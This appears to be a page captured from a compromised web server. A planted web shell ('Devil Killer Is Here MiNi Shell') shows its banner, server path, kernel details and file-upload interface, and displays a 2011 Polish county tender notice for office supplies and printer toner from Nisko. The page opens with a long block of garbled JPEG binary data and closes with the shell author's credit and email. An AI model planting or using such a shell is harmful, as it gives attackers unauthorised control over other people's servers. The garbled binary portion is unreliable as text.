JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110225/30162-N-2011.html

<p class="kh_header"><b>Nisko: Dostawa dla potrzeb Starostwa Powiatowego w Nisku materiałów biurowych i papierniczych oraz materiałów eksploatacyjnych do drukarek i kserokopiarek.</b><br>
<b>Numer ogłoszenia: 30162 - 2011; data zamieszczenia: 25.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa dla potrzeb Starostwa Powiatowego w Nisku materiałów biurowych i papierniczych oraz materiałów eksploatacyjnych do drukarek i kserokopiarek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla potrzeb Starostwa Powiatowego w Nisku materiałów biurowych i papierniczych oraz materiałów eksploatacyjnych do drukarek i kserokopiarek.

Dostawa materiałów biurowych i papierniczych oraz materiałów eksploatacyjnych do drukarek i kserokopiarek realizowana będzie sukcesywnie w miarę potrzeb Zamawiającego, na podstawie szczegółowych zamówień w terminie do dnia 30 września 2011 r. 

Zamówienie podzielone zostało na części:
Część I - Dostawa materiałów biurowych i papierniczych 
Część II - Dostawa materiałów eksploatacyjnych do drukarek i kserokopiarek  

Szczegółowy opis przedmiotu zamówienia:

Część I -  Dostawa materiałów biurowych i papierniczych 

Lp.
Nazwa materiału
jedn.
ilość
1
Blok listowy w kratkę A5,biały papier, 60 kart, dobry gatunkowo
szt
80
2
Blok listowy w kratkę A4,biały papier, 100 kart, 
szt
50
3
Długopis czerwony, zwykły
szt
50
4
Długopis na sprężynce
szt
50
5
Długopis żelowy t.gel pen dobrej jakości
szt
200
6
Długopis zwykły dobrej jakości
szt
300
7
Dziurkacz do 25  kartek, z wysuwanym ogranicznikiem
szt
10
8
Dysk CD R w obudowie t. slim
szt
400
9
Dysk CD RW w obudowie t.slim
szt
50
10
Dysk DVD+ R  w obudowie t.slim
szt
100
11
Fastykuła, twarde okładki
szt
100
12
Folia do bindowania (100 szt)
opak
4
13
Foliopis, marker do CD, 0,4 mm, czarny, niezmywalny t. Pentel
szt
48
14
Gumki do ołówka
szt
50
15
Grafity o podwyższonej wytrzymałości na złamanie 0,5mm 
opak
20
16
Klipy biurowe: 19mm (12 sztuk)
opak
10
17
Klipy biurowe: 25mm (12sztuk)
opak
10
18
Klipy biurowe: 32mm (12 sztuk)
opak
10
19
Klipy biurowe: 41mm (12sztuk)
opak
10
20
Klipy biurowe: 51mm (12 sztuk)
opak
10
21
Koperta A 4 , biała samoklejąca /250 szt/
opak
6
22
Koperta B 4, biała samoklejąca /250 szt/
opak
6
23
Koperta C 5, biała samoklejąca /500 szt/
opak
15
24
Koperta E4 z rozszerzonym dołem
szt
50
25
Koperta C 6, biała samoklejąca /1000 szt/
opak
15
26
Koperty  bąbelkowe  do przesyłania dysków CD
szt
50
27
Kostka samoprzylepna kolorowa 38x51 mm
szt
100
28
Kostka samoprzylepna kolorowa 76x76 mm
szt
100
29
Koszulka foliowa A4 /100 szt/
opak
15
30
Korektor w taśmie t.pritt
szt
100
31
Korektor poj.4,2 ml  t.pentel
szt
100
32
Kostka kolorowa luz
szt
50
33
Klej biurowy t.Esselte , 20 g
szt
75
34
Linijka 20 cm
szt
30
35
Nożyczki  18 do 20 cm     
szt
20
36
Okładki do bindowania (100szt)
kpl
2
37
Ołówek zwykły HB
szt
50
38
Ołówek automatyczny t.pentel
szt
50
39
Papier ksero A4, CIE 161, 80 g/m2 /500szt/
ryza
800
40
Papier ksero A3 CIE 161, 80 g/m2 /500szt/
ryza
30
41
Papier wizytówkowy marmurkowy 246 g , A4 (25szt)
opak
10
42
Poduszka do stempli, czerwona
szt
5
43
Rozszywacz
szt
10
44
Segregator kolorowe A4, 50 mm t. Esselte
szt
200
45
Segregator kolorowe A4, 75 mm t. Esselte
szt
300
46
Skoroszyt zawieszkowy A4, biały
szt
200
47
Skoroszyt zwykły, biały
szt
300
48
Skoroszyt oczkowy A4, biały, kartonowy
szt
500
49
Skoroszyt plastikowy
szt
200
50
Skoroszyt zawieszkowy plastikowy
szt
300
51
Skoroszyt zawieszkowy 1/2, kartonowy
szt
250
52
Spinacze trójkątne T25 /100szt/
opak
50
53
Spinacze duże R 50 /100 szt/
opak
50
54
Tusz do stempli czerwony / dobry czerwony/
Szt
10
55
Taśma klejąca 24mm x 10m
szt
40
56
Temperówka z pojemnikiem
szt
30
57
Teczka A4 z gumką na większą ilość dokumentów (kolory)
szt
100
58
Teczka papierowa wiązana A4 , biała na większą ilość dokumentów
szt
1500
59
Zakreślacz kolorowy (żółty, zielony, pomarańczowy)
szt
150
60
Zeszyt 60 k A5 kratka, biały
szt
30
61
Zeszyt 16 kart A5 kratka, biały
szt
30
62
Zeszyt 96 k, A4, biały, kratka, twarda okładka
szt
50
63
Znaczniki samoprzylepne 15x50 mm /5 szt/
opak
20
64
Zszywacz do 30 kartek
szt
10
65
Zszywki 24/6
opak
100

Część II - Dostawa materiałów eksploatacyjnych do drukarek i kserokopiarek  

Lp.
Nazwa materiału
jedn.
ilość
O/R
1
Atrament HP 840 kolor, 15 ml
szt
2

2
Atrament HP 840  czarny, 25 ml
szt
4

3
Atrament HP 3550 czarny, 10 ml
szt
5

4
Atrament HP 3550 kolor, 8ml
szt
4

5
Atrament HP 8600 czarny, 58,5ml
szt
4

6
Atrament HP 8600 kolor 17ml
kpl
4

7
Atrament HP 1360 , kolor, 5 ml
szt
2

8
Atrament HP 1360 , czarny, 10ml
szt
2

9
Atrament HP 510 PS kolor,  ploter, 3x69ml
kpl
1
O
10
Atrament HP 510 PS czarny, ploter, 69 ml
szt
2
O
11
Toner OKI B 430, 7000 kopii
szt
2

12
Toner HP 1100 LJ, 2500 kopii
szt
6

13
Toner HP 1300 LJ, 4000 kopii
szt
2

14
Toner HP 1505 n, 2000 kopii
szt
2

15
Toner HP 1005, 1200 LJ, 3500 kopii
szt
2

16
Toner HP 1018, 2000 kopii
szt
2

17
Toner do Samsung ML 3051 ND, 4000 kopii
szt
1

18
Toner do Samsung 1640 ML, 1500 kopii
szt
4

19
Toner do Samsung 1610 D2, ML 2010 D3, 2571N , 3000 kopii
szt
15

20
 Toner do Samsung 1710 P D3, 3000 kopii
szt
3

21
Toner Lexmark 321, 6000 kopii
szt
4

22
Toner Lexmark 120 E, 2000 kopii
szt
10
O
23
Toner Dell 2330 d, 6000 kopii
szt
5
O
24
Toner Dell 2230 d, 3500 kopii
szt
10
O
25
Toner RICOH MPC 2050 kolor
kpl
1
O
26
Toner RICOH MPC 2050 czarny
szt
3
O
27
Toner RICOH 240 W 
szt
1
O
28
Toner do ksero RICOH AFFICIO 2022
szt
10
O.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.21.13-6, 30.12.51.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania - na potwierdzenie których Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 1 (Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie posiadania wiedzy i doświadczenia - na potwierdzenie których Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 2, (Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie dysponowania odpowiednim potencjałem technicznym Wykonawca składa oświadczenie z art. 22 ust 1 pkt. 3 (Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - na potwierdzenie spełnienia tego warunku Wykonawca składa oświadczenie               o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt.3 (załącznik            nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie sytuacji ekonomicznej i finansowej - na potwierdzenie tego warunku Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 4 (Załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wraz z wypełnionym Załącznikiem A lub B do Formularza Ofertowego (Załącznik nr 1 do SIWZ). Wartość kosztorysowa musi zawierać wszystkie koszty związane z realizacją zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Znajdują się w § 9 ust 2 Wzoru umowy cyt. 2.Dopuszczalne są następujące przypadki  i warunki zmiany umowy:
2.1. zmniejszenie zakresu przedmiotu zamówienia gdy jego wykonanie w pierwotnym 	zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu Zamawiającego,
2.2. zmiany terminu realizacji przedmiotu zamówienia, w przypadku:
2.2.1. gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego w zakresie uzasadnionego interesu Zamawiającego,
2.3.wystapienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia,
2.4. zaistnienia okoliczności (technicznych, gospodarczych itp.) których nie można było przewidzieć chwili zawarcia umowy,
2.5. konieczności zmiany osób przewidzianych  do wykonania przedmiotu umowy,
2.6.wprowadzenia nowej technologii lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2, 37-400 Nisko - Wydział Gospodarki Mieniem Powiatu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2011 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku, Plac Wolności 2, 37-400 Nisko - Biuro Obsługi Interesanta           (pokój Nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com